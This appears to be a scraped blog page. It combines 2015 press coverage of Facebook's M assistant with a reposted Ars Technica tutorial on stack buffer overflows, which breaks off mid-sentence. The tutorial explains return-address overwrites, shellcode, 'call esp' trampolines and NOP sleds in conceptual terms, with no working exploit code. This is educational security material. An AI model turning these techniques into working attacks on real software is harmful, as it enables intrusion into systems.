<figure class="carve wp-caption portrait alignnone fade-in-up" data-js="fader" id="attachment_1841897"><a href="https://www.blogger.com/null" role="presentation" tabindex="-1"><img alt="m-example-02-press" class="size-inset-image wp-image-1841897 cursor-zoom" data-order="1" data-ui="overlayOpen" height="563" src="http://www.wired.com/wp-content/uploads/2015/08/m-example-02-press-289x563.jpg" width="289" /><span class="visually-hidden">Click to Open Overlay Gallery</span></a><figcaption class="wp-caption-text link-underline"><span class="credit link-underline-sm"><span class="ui ui ui-illo inline-block ui-credit relative opacity-5 marg-r-micro"></span> Facebook</span></figcaption></figure>
For now, M doesn’t pull from the social data Facebook collects to
complete tasks. So, if you request a gift for your spouse, the service
will make suggestions based only on your answers to questions it asks
you and previous conversations you and M have had. Marcus says that may
change “at some point, with proper user consent.” The service is free,
and will be available to all Facebook Messenger users eventually.<br />
In internal tests, Facebook employees have been using M for several
weeks to do everything from organizing dinner parties to tracking down
an unusual beverage in New Orleans. “An engineer went to Paris for a
couple days, and his friend asked M to redecorate his desk in a French
style,” Marcus says. “Twenty-four hours later, the desk was decorated
with a proper napkin, baguette bread, and a beret.” One of M’s most
popular requests from its Facebook employee testers: the service can
call your cable company and endure the endless hold times and automated
messages to help you set up home wifi or cancel your HBO.<br />
<h3>
The Human Element</h3>
The thing is: that’s a person on hold on your behalf. Facebook’s M
trainers have customer service backgrounds. They make the trickier
judgment calls, and perform other tasks that software can’t. If you ask M
to plan a birthday dinner for your friend, the software might book the
Uber and the restaurant, but a person might surprise your friend at the
end of the night by sending over birthday cupcakes from her favorite
bakery. “M learns from human behaviors,” says Marcus. <br />
<figure class="carve wp-caption portrait alignnone fade-in-up" data-js="fader" id="attachment_1841896"><a href="https://www.blogger.com/null" role="presentation" tabindex="-1"><img alt="m-example-01-press" class="size-inset-image wp-image-1841896 cursor-zoom" data-order="2" data-ui="overlayOpen" height="563" src="http://www.wired.com/wp-content/uploads/2015/08/m-example-01-press-289x563.jpg" width="289" /><span class="visually-hidden">Click to Open Overlay Gallery</span></a><figcaption class="wp-caption-text link-underline"><span class="credit link-underline-sm"><span class="ui ui ui-illo inline-block ui-credit relative opacity-5 marg-r-micro"></span> Facebook</span></figcaption></figure>
Eventually, the service might be sophisticated enough to figure this
out on its own, but not soon. Right now, M trainers sit close to the
engineering team inside Facebook offices. The company confirms the
trainers are contractors but won’t say how many there are. Marcus
anticipates that over time, Facebook will employ thousands of them,
which will represent a substantial economic investment.<br />
The company anticipates the cost will be offset by the revenue growth
it is able to realize by capitalizing on M’s interactions. <a href="http://www.wired.com/2015/08/facebook-launches-m-new-kind-virtual-assistant/www.wired.com/2015/08/how-facebook-m-works/">As WIRED’s Cade Metz explains</a>,
Facebook plans to use data generated by the service to feed much more
complex AI systems that can reduce the burden on the trainers. <br />
<h3>
Open for Business</h3>
It’s not hard to imagine the business opportunities that M could
spawn. For one, should Facebook discover a business is getting lots of
inbound requests, it could partner with that company to offer a more
direct, efficient service over Messenger.<br />
“If, for instance, you have a lot of calls that have to be placed by people to cable companies,” says Marcus, “That’s a p<br />
<section class="post-container clearfix relative" data-js="post" id="start-of-content" tabindex="0"><article class="content link-underline relative body-copy" data-js="content" itemprop="articleBody">retty
good signal that their customers would actually like a better way to
interact with the company and maybe they should have a presence inside
of Messenger directly.”<br />
Facebook is already helping firms offer customer service through
Messenger. At the company’s March developer conference, Marcus announced
Businesses on Messenger, a feature that allows businesses to send
receipts, notify customers their packages have shipped, and provide
basic customer service.<br />
Marcus won’t offer metrics to suggest whether the feature has caught
on among companies, but he says they have shown a lot of interest, and
his team is beginning to work out some of the kinks. “We have a lot of
threads open between businesses and people, and the engagement is very
good,” says Marcus. “Now we want to open it to more businesses.”<br />
<h3>
Beyond the Valley</h3>
Marcus anticipates that M will expand slowly over time, but that it
will eventually reach everyone. As this happens, the array of tasks it
performs will certainly grow. Facebook is, by design, rolling out its
new assistant in a community in which the users are demographically
similar to the M trainers who will be thinking up gifts for their
spouses and fun vacation destinations for them.<br />
It’s safe to say that most of Messenger’s 700 million users around
the world aren’t looking to book an Uber for a friend’s birthday party
or choose between Cancun and Maui for February break. Will M be as good
at helping users in the Bronx access food stamps? How about coming to
the aid of the single mother in Oklahoma who has a last-minute childcare
issue? Marcus is up for the challenge, and so, he says, is M.</article><article class="content link-underline relative body-copy" data-js="content" itemprop="articleBody"><div class="p1">
M combines the power of a world-leading artificial
intelligence lab with the dexterity of humans Facebook can afford to
hire and the scale of its 700 million user Messenger app.</div>
<div class="p1">
As I <a href="http://techcrunch.com/2015/08/26/facebook-is-adding-a-personal-assistant-called-m-to-your-messenger-app/">noted earlier</a>,
while Google and Apple were dicking around with the pure science of
artificial intelligence, Facebook used human helpers to brute force a
full-featured assistant. The closest thing to M might be the third-party
app <a href="https://www.techinasia.com/wesecretary-magic-for-wechat/" target="_blank">WeSecretary built atop WeChat.</a></div>
<div class="p1">
<img alt="11890988_10156070655185195_4945843629380291283_n" class="alignright wp-image-1201078" height="344" src="https://tctechcrunch2011.files.wordpress.com/2015/08/11890988_10156070655185195_4945843629380291283_n1.jpg?w=300&h=344" width="300" />Making M work for all of Messenger’s users might be slow or expensive, but it’ll probably be both.</div>
<div class="p1">
Eventually, M would ideally work with minimal human
assistance. To get there, Facebook needs time for its M contractors to
teach it the best way to solve problems. With a small workforce and
small beta, that could take a while. Growing M’s test base and the
legions of helpers behind it will cost a ton.</div>
<div class="p1">
But that’s why Facebook is so distinctly well-equipped. It
has money. Not quite Google or Apple money, but with $4 billion in
revenue and around <a href="http://techcrunch.com/2015/07/29/facebook-earnings-q2-2015/">$700 million in profit</a> last quarter, Facebook has resources to throw at M.</div>
<div>
</div>
<div class="p1">
It also has time. Facebook’s ownership of both Messenger
and the 800 million-user WhatsApp gives it a decisive lead in messaging.
It doesn’t have to worry about falling further behind while it
concentrates on R&D. I’m looking at you, Google Hangouts/Messenger.</div>
<div class="p1">
And finally, with both Messenger and WhatsApp in its
possession, Facebook has arguably the best ways to leverage a chat-based
personal assistant.</div>
<div class="p1">
<img alt="11898862_10156070655505195_4986153176672234416_n" class="alignright wp-image-1201073" height="585" src="https://tctechcrunch2011.files.wordpress.com/2015/08/11898862_10156070655505195_4986153176672234416_n1.jpg?w=300&h=585" width="300" />How will Facebook recoup this massive investment? There are plenty of ways M could make money.</div>
<div class="p1">
For example, Facebook could establish relationships with
certain product or service vendors, earning a cut for making them M’s
go-to provider for certain requests. Similar to how Shyp earns money on
the difference between the bulk shipping discounts it gets and what it
charges users, Facebook could surely find some margin to absorb it if it
can power frictionless personal assistant shopping and travel booking.</div>
<div class="p1">
Then there’s the massive opportunity to run M-triggering
ads. Imagine a Facebook ad that prompts you to message M and set up an
appointment at a local barber or restaurant. Facebook already has <a href="https://www.facebook.com/business/news/high-growth-markets" target="_blank">“Missed Call” ads</a>
in India that get you to call a business and immediately hang up so you
aren’t charged, then get called back by the business with more info.</div>
<div class="p1">
And there’s always the potential it could just charge users directly for the service, though that’s really not Facebook’s style.</div>
<div class="p1">
But the beauty of Facebook’s strategy is that it doesn’t
have to monetize M, or Messenger, directly. While competitors scramble
for ways to earn cash, Messenger lets its parent app handle the
finances.</div>
<div class="p1">
All Facebook has to do with M is make Messenger more
useful, and thereby used more. The chat app locks people into Facebook’s
social network, and that’s where it keeps the real money-maker: the
ad-filled News Feed.</div>
<div class="p1">
<br /></div>
<div class="p1">
<br /></div>
</article></section></div>
<div class="u-responsive-ratio" style="padding-bottom: 72.42%;">
</div>
<div class="u-responsive-ratio" style="padding-bottom: 72.42%;">
</div>
<br /></div>
BlackBarbie-bbhttp://www.blogger.com/profile/03407685720956138113noreply@blogger.com4tag:blogger.com,1999:blog-4509349481580895365.post-60988551732299560782015-08-27T12:51:00.000+05:302015-08-27T12:51:16.138+05:30How Buffer overflow works tutorial<div dir="ltr" style="text-align: left;" trbidi="on">
Hi friends,<br />
<br />
The following article illustrates how buffer overflow works :<br />
<br />
<span class="date" data-time="1440550856" title="Wed Aug 26 2015 06:30:56 GMT+0530 (IST)"></span>
<br />
<div class="corner-info">
<ul class="share-buttons">
<li class="share-facebook">
<a data-dialog="400:368" href="https://www.facebook.com/sharer.php?u=http%3A%2F%2Farstechnica.com%2Fsecurity%2F2015%2F08%2Fhow-security-flaws-work-the-buffer-overflow%2F" target="_blank">
<span class="share-text">Share</span>
</a>
</li>
<li class="share-twitter">
<a data-dialog="364:250" href="https://twitter.com/share?text=How+security+flaws+work%3A+The+buffer+overflow&url=http%3A%2F%2Farstechnica.com%2F%3Fp%3D679043" target="_blank">
<span class="share-text">Tweet</span>
</a>
</li>
</ul>
<a class="comment-count" href="http://arstechnica.com/security/2015/08/how-security-flaws-work-the-buffer-overflow/?comments=1" title="74 posters participating, including story author."><span>171</span></a>
</div>
<section id="article-guts">
<div class="article-content clearfix" itemprop="articleBody">
<figure class="intro-image image center full-width" style="width: 700px;">
<img height="360" src="http://cdn.arstechnica.net/wp-content/uploads/2015/08/buffer-overflow.jpg" width="700" />
<figcaption class="caption">
<div class="caption-credit">
Aurich Lawson / Thinkstock </div>
</figcaption>
</figure>
The buffer overflow has long been a feature of the computer
security landscape. In fact the first self-propagating Internet
worm—1988's Morris Worm—used a buffer overflow in the Unix <code>finger</code>
daemon to spread from machine to machine. Twenty-seven years later,
buffer overflows remain a source of problems. Windows infamously
revamped its security focus after two buffer overflow-driven exploits in
the early 2000s. And <a href="http://arstechnica.com/security/2015/05/90s-style-security-flaw-puts-millions-of-routers-at-risk/">just this May</a>, a buffer overflow found in a Linux driver left (potentially) millions of home and small office routers vulnerable to attack.<br />
At its core, the buffer overflow is an astonishingly simple bug that
results from a common practice. Computer programs frequently operate on
chunks of data that are read from a file, from the network, or even from
the keyboard. Programs allocate finite-sized blocks of
memory—buffers—to store this data as they work on it. A buffer overflow
happens when more data is written to or read from a buffer than the
buffer can hold.<br />
On the face of it, this sounds like a pretty foolish error. After
all, the program knows how big the buffer is, so it should be simple to
make sure that the program never tries to cram more into the buffer than
it knows will fit. You'd be right to think that. Yet buffer overflows
continue to happen, and the results are frequently a security
catastrophe.<br />
<aside class="manual-ad right"></aside>To
understand why buffer overflows happen—and why their impact is so
grave—we need to understand a little about how programs use memory and a
little more about how programmers write their code. (Note that
we'll look primarily at the stack buffer overflow. It's not the only
kind of overflow issue, but it's the classic, best-known kind.)
<h2>
Stack it up</h2>
Buffer overflows create problems only for native code—that is,
programs which use the processor's instruction set directly rather than
through some intermediate form such as in Java or Python. The overflows
are tied to the way the processor and native code programs manipulate
memory. Different operating systems have their own quirks, but every
platform in common use today follows essentially the same pattern. To
understand how these attacks work and some of the things people do to
try to stop them, we first have to understand a little about how that
memory is used.<br />
The most important central concept is the memory address. Every
individual byte of memory has a corresponding numeric address. When the
processor loads and stores data from main memory (RAM), it uses the
memory address of the location it wants to read and write from. System
memory isn't just used for data; it's also used for the executable code
that makes up our software. This means that every function of a running
program also has an address.<br />
In the early days of computing, processors and operating systems used
physical memory addresses: each memory address corresponded directly to
a particular piece of RAM. While some pieces of modern operating
systems still have to use these physical memory addresses, all of
today's operating systems use a scheme called virtual memory.<br />
With virtual memory, the direct correspondence between a memory
address and a physical location in RAM is broken. Instead, software and
the processor operate using virtual memory addresses. The operating
system and processor together maintain a mapping between virtual memory
addresses and physical memory addresses.<br />
This virtualization enables a range of important features. The first and foremost is <em>protected memory</em>. Every individual process gets its <em>own</em>
set of addresses. For a 32-bit process, those addresses start at zero
(for the first byte) and run up to 4,294,967,295 (or in hexadecimal, <code>0xffff'ffff</code>; 2<sup>32</sup> - 1). For a 64-bit process, they run all the way up to 18,446,744,073,709,551,615 (<code>0xffff'ffff'ffff'ffff</code>, 2<sup>64</sup> - 1). So, every process has its own address <code>0</code>, its own address <code>1</code>, its own address <code>2</code>, and so on and so forth.<br />
(For the remainder of this article, I'm going to stick to talking
about 32-bit systems, except where otherwise noted. 32- and 64-bit
systems work in essentially the same ways, so everything translates well
enough; it's just a little clearer to stick to one bitness.)<br />
Because each process gets its own set of addresses, these scheme in a
very straightforward way to prevent one process from damaging the
memory of any other: all the addresses that a process can use reference
memory belonging only to that process. It's also much easier for the
processes to deal with; physical memory addresses, while they broadly
work in the same way (they're just numbers that start at zero), tend to
have wrinkles that make them annoying to use. For example, they're
usually not contiguous; address <code>0x1ff8'0000</code> is used for the
processor's System Management Mode memory; a small chunk of physical
memory that's off limits to normal software. Memory from PCIe cards also
generally occupies some of this address space. Virtual addresses have
none of these inconveniences.<br />
So what does a process have in its address space? Broadly speaking,
there are four common things, of which three interest us. The
uninteresting one is, in most operating systems, "the operating system
kernel." For performance reasons, the address space is normally split
into two halves, with the bottom half being used by the program and the
top half being the kernel's address space. The kernel-half of the memory
is inaccessible to the program's half, but the kernel itself can read
the program's memory. This is one of the ways that data is passed to
kernel functions.<br />
The first things that we need to care about are the executables and
libraries that constitute the program. The main executable and all its
libraries are all loaded into the process' address space, and all of
their constituent functions accordingly have memory addresses.<br />
The second is the memory that the program uses for storing the data
it's working on, generally called the heap. This might be used, for
example, to store the document currently being edited, the webpage (and
all its JavaScript objects, CSS, and so on) being viewed, or the map for
the game being played.<br />
The third and most important is the call stack, generally just called
the stack. This is the most complex aspect. Every thread in a process
has its own stack. It's a chunk of memory that's used to keep track of
both the function that a thread is currently running, as well as all the
predecessor functions—the ones that were called to get to the current
function. For example, if function <code>a</code> calls function <code>b</code>, and function <code>b</code> calls function <code>c,</code> then the stack will contain information about <code>a</code>, <code>b</code>, and <code>c</code>, in that order.<br />
<figure class="image right medium" style="width: 300px;"><a class="enlarge" data-height="1837" data-width="1080" href="http://cdn.arstechnica.net/wp-content/uploads/2015/08/basic-stack.png"><img height="510" src="http://cdn.arstechnica.net/wp-content/uploads/2015/08/basic-stack-300x510.png" width="300" /></a><figcaption class="caption"><div class="caption-text">
<a class="enlarge" data-height="1837" data-width="1080" href="http://cdn.arstechnica.net/wp-content/uploads/2015/08/basic-stack.png">Enlarge</a> <span class="sep">/</span> Here we see the basic layout of our stack with a 64 character buffer called <code>name</code>, then the frame pointer, and then the return address. <code>esp</code> has the address of the top of the stack, <code>ebp</code> has the address of the frame pointer.</div>
</figcaption></figure>
The call stack is a specialized version of the more general "stack"
data structure. Stacks are variable-sized structures for storing
objects. New objects can be added ("pushed") to one end of the stack
(conventionally known as the "top" of the stack), and objects can be
removed ("popped") from the stack. Only the top of the stack can be
modified with a push or a pop, so the stack forces a kind of sequential
ordering: the most recently pushed item is the one that gets popped
first. The first item that gets pushed on the stack is the last one that
gets popped.<br />
The most important thing that the call stack does is to store <em>return addresses</em>.
Most of the time, when a program calls a function, that function does
whatever it is supposed to do (including calling other functions), and
then returns to the function that called it. To go back to the calling
function, there must be a record of what that calling function was:
execution should resume from the instruction <em>after</em> the function
call instruction. The address of this instruction is called the return
address. The stack is used to maintain these return addresses: whenever a
function is called, the return address is pushed onto the stack.
Whenever a function returns, the return address is popped off the stack,
and the processor begins executing the instruction at that address.<br />
This stack functionality is so fundamentally important that most, if
not all, processors include built-in support for these concepts.
Consider x86 processors. Among the registers (small storage locations in
the processor that can be directly accessed by processor instructions)
that x86 defines, the two that are most important are <code>eip</code>, standing for "instruction pointer," and <code>esp</code>, standing for stack pointer.<br />
<code>esp</code> always contains the address of the top of the stack. Each time something is pushed onto the stack, the value in <code>esp</code> is decreased. Each time something is popped from the stack, the value of <code>esp</code> is increased. This means that the stack grows "down;" as more things are pushed onto the stack, the address stored in <code>esp</code> gets lower and lower. In spite of this, the memory location referenced by <code>esp</code> is still called the "top" of the stack.<br />
<code>eip</code> gives the address of the currently executing instruction. The processor maintains <code>eip</code> itself. It reads the instruction stream from memory and increments <code>eip</code> accordingly so that it always has the instruction's address. x86 has an instruction for function calls, named <code>call</code>, and another one for returning from a function, named <code>ret</code>.<br />
<code>call</code> takes one operand; the address of the function to
call (though there are several different ways that this can be
provided). When a <code>call</code> is executed, the stack pointer <code>esp</code> is decremented by 4 bytes (32-bits), and the address of the instruction following the <code>call</code>, the return address, is written to the memory location now referenced by <code>esp</code>—in other words, the return address is pushed onto the stack. <code>eip</code> is then set to the address specified as operand to <code>call</code>, and execution continues from that address.<br />
<code>ret</code> does the opposite. The simple <code>ret</code> doesn't take any operands. The processor first reads the value from the memory address contained in <code>esp</code>, then increments <code>esp</code> by 4 bytes—it pops the return address from the stack. <code>eip</code> is set to this value, and execution continues from that address.<br />
<br />
The real problem comes with everything else that goes on the stack,
too. The stack happens to be a quick and efficient place for storing
data. Storing data on the heap is relatively complex; the program needs
to keep track of how much space is available on the heap, how much space
each piece of data is using, and various other bits of bookkeeping. But
the stack is also simple; to make space for some data, just decrement
the stack pointer. To tidy up when the data is no longer needed,
increment the stack pointer.
<br />
This convenience makes the stack a logical place to store the
variables that belong to a function. A function has a 256 byte buffer to
read some user input? Easy, just subtract 256 from the stack pointer
and you've created the buffer. At the end of the function, just add 256
back onto the stack pointer, and the buffer is discarded.<br />
<figure class="image right medium" style="width: 300px;"><a class="enlarge" data-height="1837" data-width="1080" href="http://cdn.arstechnica.net/wp-content/uploads/2015/08/basic-stack-normal-usage.png"><img height="510" src="http://cdn.arstechnica.net/wp-content/uploads/2015/08/basic-stack-normal-usage-300x510.png" width="300" /></a><figcaption class="caption"><div class="caption-text">
<a class="enlarge" data-height="1837" data-width="1080" href="http://cdn.arstechnica.net/wp-content/uploads/2015/08/basic-stack-normal-usage.png">Enlarge</a> <span class="sep">/</span> When we use the program correctly, the keyboard input is stored in the <code>name</code> buffer, followed by a null (zero) byte. The frame pointer and return address are unaltered.</div>
</figcaption></figure>
There are limitations to this. The stack isn't a good place to store
very large objects; the total amount of memory available is usually
fixed when a thread is created, and that's typically around 1MB in size.
These large objects <em>must</em> be placed on the heap instead. The
stack also isn't usable for objects that need to exist for longer than
the span of a single function call. Because every stack allocation is
undone when a function exits, any objects that exist on the stack can
only live as long as a function is running. Objects on the heap,
however, have no such restriction; they can hang around forever.<br />
This stack storage isn't just used for the named variables that
programmers explicitly create in their programs; it can also be used for
storing whatever other values the program may need to store. This is
traditionally a particularly acute concern on x86. x86 processors don't
have very many registers (there are only 8 integer registers in total,
and some of those, like <code>eip</code> and <code>esp,</code> already
have special purposes), and so functions can rarely keep all the values
they need in registers. To free up space in a register while still
ensuring that its current value can be retrieved later, the compiler
will push the value of the register onto the stack. The value can then
be popped later to put it back into a register. In compiler jargon, this
process of saving registers so that they can be re-used is called <em>spilling</em>.<br />
Finally, the stack is often used to pass arguments to functions. The
calling function pushes each argument in turn onto the stack; the called
function can then pop the arguments off. This isn't the only way of
passing arguments—they can be passed in registers too, for example—but
it's one of the most flexible.<br />
The set of things that a function has on the stack—its local
variables, its spilled registers, and any arguments it's preparing to
pass to another function—is called a "stack frame." Because data within
the stack frame is used so extensively, it's useful to have a way of
quickly referencing it.<br />
The stack pointer <em>can</em> do this, but it's somewhat awkward:
the stack pointer always points to the top of the stack, and so it moves
around as things are pushed and popped. For example, a variable may
start out with an address of at <code>esp + 4</code>. Two more values might be pushed onto the stack, meaning that the variable now has to be accessed at <code>esp + 12</code>. One of those values can then get popped off, so the variable is now at <code>esp + 8</code>.<br />
This isn't an insurmountable difficulty, and compilers can easily
handle the challenge. Still, it can make using the stack pointer to
access anything other than "the top of the stack" awkward, especially
for the hand-coded assembler.<br />
To make things easier, it's common to maintain a second pointer, one that consistently stores the address of the <em>bottom</em> (start) of each stack frame—a value known as the <em>frame pointer</em>—and on x86, there's even a register that's generally used to store this value, <code>ebp</code>.
Since this never changes within a given function, this provides a
consistent way to access a function's variables: a value that's at <code>ebp - 4</code> will remain at <code>ebp - 4</code>
for the whole of a function. This isn't just useful for humans; it also
makes it easier for debuggers to figure out what's going on.<br />
<div class="centered-figure-container">
<figure class="image center full-width" style="width: 980px;"><a class="enlarge" data-height="600" data-width="1734" href="http://cdn.arstechnica.net/wp-content/uploads/2015/08/visual-studio.png"><img height="339" src="http://cdn.arstechnica.net/wp-content/uploads/2015/08/visual-studio-980x339.png" width="980" /></a><figcaption class="caption"><div class="caption-text">
<a class="enlarge" data-height="600" data-width="1734" href="http://cdn.arstechnica.net/wp-content/uploads/2015/08/visual-studio.png">Enlarge</a> <span class="sep">/</span>
This screenshot from Visual Studio shows some of this in action for a
simple x86 program. On x86 processors, the register named <code>esp</code> contains the address of the top stack, in this case <code>0x0018ff00</code>, highlighted in blue (on x86, the stack actually grows downwards, toward memory address <code>0</code>, but it's still called the top of the stack anyway). This function only has one stack variable, <code>name</code>, highlighted in pink. It's a fixed size 32-byte buffer. Because it's the only variable, its address is also <code>0x0018ff00</code>, the same as the top of the stack.
x86 also has a register called <code>ebp</code>, highlighted in red,
that's (normally) dedicated to storing the location of the frame
pointer. The frame pointer is placed immediately after the stack
variables. Right after the frame pointer is the return address,
highlighted in green. The return address references a code fragment with
address <code>0x00401048</code>. This instruction comes immediately after a <code>call</code> instruction, making clear the way the return address is used to resume execution from where the calling function left off.</div>
</figcaption></figure></div>
<figure class="image right medium" style="width: 300px;"><a class="enlarge" data-height="1989" data-width="1080" href="http://cdn.arstechnica.net/wp-content/uploads/2015/08/basic-stack-overflow-a.png"><img height="553" src="http://cdn.arstechnica.net/wp-content/uploads/2015/08/basic-stack-overflow-a-300x553.png" width="300" /></a><figcaption class="caption"><div class="caption-text">
<a class="enlarge" data-height="1989" data-width="1080" href="http://cdn.arstechnica.net/wp-content/uploads/2015/08/basic-stack-overflow-a.png">Enlarge</a> <span class="sep">/</span>
Unfortunately <code>gets()</code> is a really stupid function. If we just hold down A on the keyboard it won't stop once it's filled the <code>name</code>
buffer. It'll just keep on writing data to memory, overwriting the
frame pointer, the return address, and anything and everything else it
can.</div>
</figcaption></figure>
<code>name</code> in the above screenshot is the kind of buffer
that's regularly overflowed. Its size is fixed at exactly 64 characters.
In this case it's filled with a bunch of numbers, and it ends in a
final null. As should be clear from the above picture, if more than 64
bytes are written into the <code>name</code> buffer, then other values
on the stack will be damaged. If four extra bytes are written, the frame
pointer will be destroyed. If <em>eight</em> extra bytes are written, both the frame pointer and the return address get overwritten.<br />
Clearly this will lead to damaging the program's data, but the
problem of buffer flows is more serious: they often lead to code
execution. This happens because those overflowed buffers won't just
overwrite data. They can also overwrite the other important thing kept
on the stack—those return addresses. The return address controls which
instructions the processor will execute when it's finished with the
current function; it's meant to be some location within the calling
function, but if it gets overwritten in a buffer overflow, it could
point anywhere. If attackers can control the buffer overflow, they can
control the return address; if they can control the return address, they
can choose what code the processor executes next.<br />
The process probably won't have some nice, convenient "compromise the
machine" function for the attacker to run, but that doesn't really
matter. The same buffer that was used to overwrite the return address
can also be used to hold a short snippet of executable code, called
shellcode, that will in turn download a malicious executable, or open up
a network connection, or do whatever else the attacker fancies.<br />
Traditionally, this was trivial to do because of a trait that may
seem a little surprising: generally, each program would use the same
memory addresses each time you ran it, even if you rebooted in between.
This means that the location of the buffer on the stack would be the
same each time, and so the value used to overwrite the return address
could be the same each time. An attacker only had to figure out what the
address was once, and the attack would work on <em>any</em> computer running the flawed code.<br />
<div class="superscroll-placeholder loaded" data-page="1">
<div class="superscroll-content show">
<h2>
An attacker's toolkit</h2>
In an ideal world—for the attacker, that is—the overwritten return
address can simply be the address of the buffer. When the program is
reading input from a file or a network, this can often be the case for
example.<br />
Other times the attacker has to employ tricks. In functions that
process human-readable text, the zero byte (or "null") is often treated
specially; it indicates the end of a string, and the functions used for
manipulating strings—copying them, comparing them, combining them—will
stop whenever they hit the null character. This means that if the
shellcode contains the null character, those routines are liable to
break it.<br />
<div class="centered-figure-container">
<figure class="video center" style="width: 980px;"><div style="height: 552px; width: 980px;">
</div>
<figcaption class="caption"><div class="caption-text">
See a buffer
overflow in action. In this video, we put shellcode into the buffer and
then overwrite the return address to execute it. Our shellcode runs the
Windows calculator.</div>
</figcaption></figure></div>
<figure class="image right medium" style="width: 300px;"><a class="enlarge" data-height="1837" data-width="1413" href="http://cdn.arstechnica.net/wp-content/uploads/2015/08/basic-stack-exploit.png"><img height="390" src="http://cdn.arstechnica.net/wp-content/uploads/2015/08/basic-stack-exploit-300x390.png" width="300" /></a><figcaption class="caption"><div class="caption-text">
<a class="enlarge" data-height="1837" data-width="1413" href="http://cdn.arstechnica.net/wp-content/uploads/2015/08/basic-stack-exploit.png">Enlarge</a> <span class="sep">/</span>
To exploit the overflow, instead of just writing As and smashing
everything, the attacker fills the buffer with shellcode: a short piece
of executable code that will perform some action of the attacker's
choosing. The return address is then overwritten with an address
referring to the buffer, directing the processor to execute the
shellcode when it tries to return from a function call.</div>
</figcaption></figure>
To handle this, attackers can use various techniques. Pieces of code
can convert shellcode that contains null characters into equivalent
sequences that avoid the problem byte. They can even handle quite strict
restrictions; for example, an exploitable function may only accept
input that can be typed on a standard keyboard.<br />
The address of the stack itself often contains a null byte, which is
similarly problematic: it means that the return address cannot be
directly set to the address of the stack buffer. Sometimes this isn't a
big issue, because some of the functions that are used to fill (and,
potentially, overflow) buffers will write a null byte themselves. With
some care, they can be used to put the null byte in just the right place
to set the return address to that of the stack.<br />
Even when that isn't possible, this situation can be handled with
indirection. The program and all its libraries mean that memory is
littered with executable code. Much of this executable code will have an
address that's "safe," which is to say has no null bytes.<br />
What the attacker has to do is find a usable address that contains an instruction such as x86's <code>call esp</code>,
which treats the value of the stack pointer as the address of a
function and begins executing it—a perfect match for a stack buffer that
contains the shellcode. The attacker then uses the address of the <code>call esp</code>
instruction to overwrite the return address; the processor will take an
extra hop through this address but still end up running the shellcode.
This technique of bouncing through another address is called
"trampolining."<br />
<figure class="image right medium" style="width: 300px;"><a class="enlarge" data-height="1837" data-width="1502" href="http://cdn.arstechnica.net/wp-content/uploads/2015/08/basic-stack-exploit-trampoline.png"><img height="367" src="http://cdn.arstechnica.net/wp-content/uploads/2015/08/basic-stack-exploit-trampoline-300x367.png" width="300" /></a><figcaption class="caption"><div class="caption-text">
<a class="enlarge" data-height="1837" data-width="1502" href="http://cdn.arstechnica.net/wp-content/uploads/2015/08/basic-stack-exploit-trampoline.png">Enlarge</a> <span class="sep">/</span>
Sometimes it can be difficult to overwrite the return address with the
address of the buffer. To handle this, we can overwrite the return
address with the address of a piece of executable code found within the
victim program (or its libraries). This fragment of code will transfer
execution to the buffer for us.</div>
</figcaption></figure>
This works because, again, the program and all its libraries occupy
the same memory addresses every time they run—even across reboots and
even across different machines. One of the interesting things about this
is that the library that provides the trampoline does not need to ever
perform a <code>call esp</code> itself. It just needs to offer the two bytes (in this case <code>0xff</code> and <code>0xd4</code>)
adjacent to each other. They could be part of some other instruction or
even a literal number; x86 isn't very picky about this kind of thing.
x86 instructions can be very long (up to 15 bytes!) and can be located
at any address. If the processor starts reading an instruction from the
middle—from the second byte of a four byte instruction, say—the result
can often be interpreted as a completely different, but still valid,
instruction. This can make it quite easy to find useful trampolines.<br />
Sometimes, however, the attack can't set the return address to <em>exactly</em>
where it needs to go. Although the memory layout is very similar, it
might vary slightly from machine to machine or run to run. For example,
the precise location of an exploitable buffer might vary back and forth
by a few bytes depending on the system's name or IP address, or because a
minor update to the software has made a very small change. To handle
this, it's useful to be able to specify a return address that's <em>roughly</em> correct but doesn't have to be <em>exactly</em> correct.<br />
This can be handled easily through a technique called the "NOP sled."
Instead of writing the shellcode directly into the buffer, the attacker
writes a large number of "NOP" instructions (meaning "no-op"; they're
instructions that don't actually do anything), sometimes hundreds of
them, before the real shellcode. To run the shellcode, the attacker only
needs to set the return address to <em>somewhere</em> among these NOP
instructions. As long as they land within the NOPs, the processor will
quickly run through them until it reaches the real shellcode.<br />
<h2>
Blame C</h2>
The core bug that enables these attacks, writing more to a buffer
than the buffer has space for, sounds like something that should be
simple to avoid. It's an exaggeration (but only a slight one) to lay the
blame entirely on the C programming language and its more or less
compatible offshoots, namely C++ and Objective-C. The C language is old,
widely used, and essential to our operating systems and software. It's
also appallingly designed, and while all these bugs are avoidable, C
does its damnedest to trip up the unwary.<br />
As an example of C's utter hostility to safe development, consider the function <code>gets()</code>. The <code>gets()</code>
function takes one parameter—a buffer—and reads a line of data from
standard input (which normally means "the keyboard"), then puts it into
the buffer. The observant may have noticed that <code>gets()</code> doesn't include a parameter for the buffer's size, and as an amusing quirk of C's design, there's no way for <code>gets()</code> to figure out the buffer's size for itself. And that's because <code>gets()</code>
just doesn't care: it will read from standard input until the person at
the keyboard presses return, then try to cram everything into the
buffer, even if the person typed far more than the buffer could ever
contain.<br />
This is a function that literally cannot be used safely. Since
there's no way of constraining the amount of text typed at the keyboard,
there's no way of preventing <code>gets()</code> from overflowing the
buffer it is passed. The creators of the C standard did soon realize the
problem; the 1999 revision to the C specification deprecated <code>gets()</code>,
while the 2011 update removed it entirely. But its existence—and
occasional usage—is a nice indication of the kind of traps that C will
spring on its users.<br />
The Morris worm, the first self-replicating malware that spread
across the early Internet in a couple of days in 1988, exploited this
function. The BSD 4.3 <code>fingerd</code> program listened for network connections on port 79, the <code>finger</code> port. <code>finger</code>
is an ancient Unix program and corresponding network protocol used to
see who's logged in to a remote system. It can be used in two ways; a
remote system can be queried to see everyone currently logged in.
Alternatively, it can be queried about a specific username, and it will
tell you some information about that user.<br />
Whenever a connection was made to the <code>finger</code> daemon, it would read from the network—using <code>gets()—</code>into a 512 byte buffer on the stack. In normal operation, <code>fingerd</code> would then spawn the <code>finger</code> program, passing it the username if there was one. The <code>finger</code> program was the one that did the real work of listing users or providing information about any specific user. <code>fingerd</code> was simply responsible for listening to the network and starting <code>finger</code> appropriately.<br />
Given that the only "real" parameter is a possible username, 512
bytes is plainly a huge buffer. Nobody is likely to have a username
anything like that long. But no part of the system actually enforced
